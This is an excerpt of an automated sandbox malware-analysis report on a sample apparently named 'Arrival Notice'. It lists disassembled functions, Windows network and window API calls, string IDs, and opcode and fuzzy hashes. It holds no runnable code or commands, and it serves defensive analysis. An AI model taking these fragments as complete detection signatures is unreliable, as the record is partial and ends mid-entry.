                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CapsDesktopDeviceReleaseWindow
                  • String ID:
                  • API String ID: 2889604237-0
                  • Opcode ID: 4332353670b8da1c4bfab3ef3aba947c43dcd66343f85549bae6bd1e68742fe4
                  • Instruction ID: 4f1cf93a8abd32487a6799fe9d7babdcb0ebb0ddfd837361c192aa5d9754644f
                  • Opcode Fuzzy Hash: 4332353670b8da1c4bfab3ef3aba947c43dcd66343f85549bae6bd1e68742fe4
                  • Instruction Fuzzy Hash: E4E04F78C01200DFCF919FA0D84C66DBBB5FB08310F199068F906E7260CB3859029F44
                  Function 00424D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 003B7620: _wcslen.LIBCMT ref: 003B7625
                  • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00424ED4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Connection_wcslen
                  • String ID: *$LPT
                  • API String ID: 1725874428-3443410124
                  • Opcode ID: d08e6698b268c1b1de5f182fc09b8aca189b7785663d47c4495638fc2f5fa366
                  • Instruction ID: e0e7a12d1a7158edb8775b9e7d79424e90ef94f36657e469fbb257259cbee649
                  • Opcode Fuzzy Hash: d08e6698b268c1b1de5f182fc09b8aca189b7785663d47c4495638fc2f5fa366
                  • Instruction Fuzzy Hash: 1591D275A002149FCB14DF54D580EAABBF1FF84308F59809AE40A9F7A2C735ED85CB95
                  Function 003DE27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                  Download Yara Rule
                  APIs
                  • __startOneArgErrorHandling.LIBCMT ref: 003DE30D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ErrorHandling__start
                  • String ID: pow
                  • API String ID: 3213639722-2276729525
                  • Opcode ID: 1694476fbc1cb30825190e26dc82832464ba57aad0ac568c431f013ea326610b
                  • Instruction ID: f0f33a80e1e0ff7aad2f0c23fc359726c0a32c91ff9602ee287eebbbcdd582f1
                  • Opcode Fuzzy Hash: 1694476fbc1cb30825190e26dc82832464ba57aad0ac568c431f013ea326610b
                  • Instruction Fuzzy Hash: 6C518063A0C242D6CB177715ED013BA3FA8EB40741F354FAAE0D54A3E9EB348C959A46
                  Function 00437771 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                  Download Yara Rule
                  APIs
                  • CharUpperBuffW.USER32(0040569E,00000000,?,0044CC08,?,00000000,00000000), ref: 004378DD
                    • Part of subcall function 003B6B57: _wcslen.LIBCMT ref: 003B6B6A
                  • CharUpperBuffW.USER32(0040569E,00000000,?,0044CC08,00000000,?,00000000,00000000), ref: 0043783B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: BuffCharUpper$_wcslen
                  • String ID: <sG
                  • API String ID: 3544283678-1050295264
                  • Opcode ID: c2d1e4d1b8b516ca947283a641b5156fe14014e7b411e8537db9d73a2695b10b
                  • Instruction ID: 9fe0dfd1fb9c4d5e659e08563d658f213539c9e11900d83ab0899e6adce3f2bb
                  • Opcode Fuzzy Hash: c2d1e4d1b8b516ca947283a641b5156fe14014e7b411e8537db9d73a2695b10b
                  • Instruction Fuzzy Hash: E16171B6914118EACF16FBA4CC91EFEB3B4BF18304F545126F642BB151EF285A05CBA4
                  Function 003CE187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID:
                  • String ID: #
                  • API String ID: 0-1885708031
                  • Opcode ID: 63f47d6872717ee27082d8f5eeb9b1f7765c7c60c79f1616360788abfc09bad6
                  • Instruction ID: a90e83f4d04e4d7070c43c42b97e420206767e12f8789e0ebacbd34c9a1de58f
                  • Opcode Fuzzy Hash: 63f47d6872717ee27082d8f5eeb9b1f7765c7c60c79f1616360788abfc09bad6
                  • Instruction Fuzzy Hash: 8C513636500246DFDB16EF25C081BFA7BA8EF15310F24486AEC91EB2D0D7389D52CB55
                  Function 003CF291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                  Download Yara Rule
                  APIs
                  • Sleep.KERNEL32(00000000), ref: 003CF2A2
                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 003CF2BB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: GlobalMemorySleepStatus
                  • String ID: @
                  • API String ID: 2783356886-2766056989
                  • Opcode ID: 2fee00b0d15564182be6db4a5720c51d249d3018f122003df6d24cc8b322cd92
                  • Instruction ID: bfb375b60aa4a0ea9cad1a3b7a591beaf9dde7ee0f8969a6d67a51f67d8e7d3e
                  • Opcode Fuzzy Hash: 2fee00b0d15564182be6db4a5720c51d249d3018f122003df6d24cc8b322cd92
                  • Instruction Fuzzy Hash: 805135714187449BD321AF10DC86BAFBBF8FB84708F81885DF2D9851A5EB708529CB67
                  Function 00435745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                  Download Yara Rule
                  APIs
                  • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 004357E0
                  • _wcslen.LIBCMT ref: 004357EC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: BuffCharUpper_wcslen
                  • String ID: CALLARGARRAY
                  • API String ID: 157775604-1150593374
                  • Opcode ID: 220cee7ad23ae80b1430b1e420f96b36a2bb5db06ad8091106651a87d21c85fa
                  • Instruction ID: f80ec9d5e367b4c9e6fffeb5711a1b7f93bd6f93e2c96419de7c0ac17d4d8aa7
                  • Opcode Fuzzy Hash: 220cee7ad23ae80b1430b1e420f96b36a2bb5db06ad8091106651a87d21c85fa
                  • Instruction Fuzzy Hash: 5941A131A002099FCB18EFA9C8819FEBBB5EF59314F14506EE505AB351E7389D81CB94
                  Function 0042D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                  Download Yara Rule
                  APIs
                  • _wcslen.LIBCMT ref: 0042D130
                  • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0042D13A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CrackInternet_wcslen
                  • String ID: |
                  • API String ID: 596671847-2343686810
                  • Opcode ID: 9b4be7decc359f3ae970fda2941830ba859496008d7e9d3a8628b03833d646ad
                  • Instruction ID: 340c529b118116b8903075c5f721a1572a58d39e9ae80a642ee46f1dc73c461b
                  • Opcode Fuzzy Hash: 9b4be7decc359f3ae970fda2941830ba859496008d7e9d3a8628b03833d646ad
                  • Instruction Fuzzy Hash: DB313E75D00219ABCF15EFA4DD85AEF7FB9FF04304F10001AF915AA262D735A916CB54
                  Function 0044356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                  Download Yara Rule
                  APIs
                  • DestroyWindow.USER32(?,?,?,?), ref: 00443621
                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0044365C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Window$DestroyMove
                  • String ID: static
                  • API String ID: 2139405536-2160076837
                  • Opcode ID: 311d67e8db6191f34074a64da147c25a27ed595a6cfc6e57fa8d486c2a2f6e45
                  • Instruction ID: b9ce9af34ebb4af0d4c340d4d17eb70bb7ccec0aadcd5e24de4f4c0d06f0f0fa
                  • Opcode Fuzzy Hash: 311d67e8db6191f34074a64da147c25a27ed595a6cfc6e57fa8d486c2a2f6e45
                  • Instruction Fuzzy Hash: 9731A171100204AAEB20DF24DC81EFB73A9FF48B24F01861EF9A597280DA34AD81C768
                  Function 00444537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 0044461F
                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00444634
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: MessageSend
                  • String ID: '
                  • API String ID: 3850602802-1997036262
                  • Opcode ID: 95f821a54266887f8c420861665a39bd5af0a2fe5a14a3750483768ac855abb7
                  • Instruction ID: 36686762512fc47741a04032cd829636dedf50c771dfc034ceab03e8603ec0a9
                  • Opcode Fuzzy Hash: 95f821a54266887f8c420861665a39bd5af0a2fe5a14a3750483768ac855abb7
                  • Instruction Fuzzy Hash: 8A314C74A01309AFEF14CFA9C981BDA7BB5FF49300F15406AEA04AB391D774A941CF94
                  Function 004431EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0044327C
                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00443287
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: MessageSend
                  • String ID: Combobox
                  • API String ID: 3850602802-2096851135
                  • Opcode ID: 6ac7e8860dfd47fbce6669a46857bc594570555974097cdb5173a53474234172
                  • Instruction ID: 5c9b8e89763f6890a008480c2a3edf4f4b2d1eba25170eca29da98e709aa2ac6
                  • Opcode Fuzzy Hash: 6ac7e8860dfd47fbce6669a46857bc594570555974097cdb5173a53474234172
                  • Instruction Fuzzy Hash: DF11E2713002087FFF219F94DC81EBB376AFB947A5F10412AF91897290D6B99D518764
                  Function 00443710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 003B600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 003B604C
                    • Part of subcall function 003B600E: GetStockObject.GDI32(00000011), ref: 003B6060
                    • Part of subcall function 003B600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 003B606A
                  • GetWindowRect.USER32(00000000,?), ref: 0044377A
                  • GetSysColor.USER32(00000012), ref: 00443794
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                  • String ID: static
                  • API String ID: 1983116058-2160076837
                  • Opcode ID: 61a656c21413a791fe2d9a1564f39af89eca78b8ab349c7f0d2a906206f7022e
                  • Instruction ID: 168d44682bc386deac8787b2d834630d65310f24611236d89037d06c4612018c
                  • Opcode Fuzzy Hash: 61a656c21413a791fe2d9a1564f39af89eca78b8ab349c7f0d2a906206f7022e
                  • Instruction Fuzzy Hash: 78112CB2610209AFEB01DFA8CC46EEE7BB8EB09715F004525F995E2250D739E8519B54
                  Function 0042CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                  Download Yara Rule
                  APIs
                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0042CD7D
                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0042CDA6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Internet$OpenOption
                  • String ID: <local>
                  • API String ID: 942729171-4266983199
                  • Opcode ID: b2f34c750dfc56c2c7dbdae7998c073c16e8af1cf9069fd0b742d9057eb0f00b
                  • Instruction ID: cd4e5e2a3cead890851a6d8bdcd305374b148d713963dc245505c5b4256268d4
                  • Opcode Fuzzy Hash: b2f34c750dfc56c2c7dbdae7998c073c16e8af1cf9069fd0b742d9057eb0f00b
                  • Instruction Fuzzy Hash: 3F11E3753616327AD7244B669CC4EEBBE68EB127A4F804237B10983180D2689845D6F4
                  Function 00443429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetWindowTextLengthW.USER32(00000000), ref: 004434AB
                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004434BA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: LengthMessageSendTextWindow
                  • String ID: edit
                  • API String ID: 2978978980-2167791130
                  • Opcode ID: 7acb5f156cfd8bed2198edba00d29d4fc220d8ff3990979a8a96e540dd202423
                  • Instruction ID: 60f7453e20076353dd9be38e7ad67c3b0c0ca9d911aa5597fba7ab372f0583a5
                  • Opcode Fuzzy Hash: 7acb5f156cfd8bed2198edba00d29d4fc220d8ff3990979a8a96e540dd202423
                  • Instruction Fuzzy Hash: 1B11BF71100108ABFB125F64DC81AEB376AEB15B79F504326F960932E0C739EC519B58
                  Function 00416C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 003B9CB3: _wcslen.LIBCMT ref: 003B9CBD
                  • CharUpperBuffW.USER32(?,?,?), ref: 00416CB6
                  • _wcslen.LIBCMT ref: 00416CC2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: _wcslen$BuffCharUpper
                  • String ID: STOP
                  • API String ID: 1256254125-2411985666
                  • Opcode ID: 341ee724b5df8aefc0a6919478739d3c78a67be76189df76a1a4d7e4750bf402
                  • Instruction ID: 14d4e74b2d98c9eb313fd50e1204dafbc95d4d2bedb214f35f44c5ec8c0ffab9
                  • Opcode Fuzzy Hash: 341ee724b5df8aefc0a6919478739d3c78a67be76189df76a1a4d7e4750bf402
                  • Instruction Fuzzy Hash: 2301D6326005268BCB219FBDEC809FF77B5EB61714752053AE95297290FB39D980C794
                  Function 00411CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 003B9CB3: _wcslen.LIBCMT ref: 003B9CBD
                    • Part of subcall function 00413CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00413CCA
                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00411D4C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ClassMessageNameSend_wcslen
                  • String ID: ComboBox$ListBox
                  • API String ID: 624084870-1403004172
                  • Opcode ID: 2932b75fa65586d6a7e5b068a48d2ecc1ee6f252657d0041592b4275c55bc1ed
                  • Instruction ID: f898bacced81f3e63f6cb34e8c32d067f6b14de5dbca33f38951602cbda1bbd0
                  • Opcode Fuzzy Hash: 2932b75fa65586d6a7e5b068a48d2ecc1ee6f252657d0041592b4275c55bc1ed
                  • Instruction Fuzzy Hash: 15012831601218AB8B04EFA0DC51DFF7768EB02354B14051BFA265B3D1EA346948C664
                  Function 00411BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 003B9CB3: _wcslen.LIBCMT ref: 003B9CBD
                    • Part of subcall function 00413CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00413CCA
                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 00411C46
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ClassMessageNameSend_wcslen
                  • String ID: ComboBox$ListBox
                  • API String ID: 624084870-1403004172
                  • Opcode ID: 141d3989d7bd64bf321faa2cf96518d391581a487ecb3f6f779a2d0bcb2d67c5
                  • Instruction ID: 7cfe9e63b247c372d7ed675e95701c0c7d0979ee09c6b51b2451c6ab203c910e
                  • Opcode Fuzzy Hash: 141d3989d7bd64bf321faa2cf96518d391581a487ecb3f6f779a2d0bcb2d67c5
                  • Instruction Fuzzy Hash: 3C01A77578110867CB15EB90CA51AFF77A89B11344F14001BAB0B6B291FA689E48C6F9
                  Function 00411C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 003B9CB3: _wcslen.LIBCMT ref: 003B9CBD
                    • Part of subcall function 00413CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00413CCA
                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 00411CC8
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ClassMessageNameSend_wcslen
                  • String ID: ComboBox$ListBox
                  • API String ID: 624084870-1403004172
                  • Opcode ID: 79a77e4620d045983f21e34b03e388d555dc2fefc9130e4c49d343e8f5c9a6cd
                  • Instruction ID: e1965d5b20f7b1832ef09bcee7c03b4858245bb85c8428f34fced00b93a1b211
